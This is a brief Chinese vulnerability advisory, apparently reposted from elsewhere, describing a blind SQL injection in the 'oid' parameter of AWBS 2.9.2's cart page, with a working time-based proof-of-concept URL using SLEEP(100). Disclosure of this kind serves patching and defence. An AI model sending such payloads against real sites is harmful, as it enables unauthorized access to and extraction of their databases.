AWBS 2.9.2 Blind SQL 注入0day

时间:2021-05-25

  影响版本:AWBS 2.9.2

  官方网站:http://

  漏洞类型:SQL注入

  漏洞描述:

  ---Vulnerability---

  http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL]

  =============================================================================================

  ---PoC Using Time-Based Blind SQL Injection---

  https:///cart?ca=add_other&oid=1'%20AND%20SLEEP(100)='

声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。

相关文章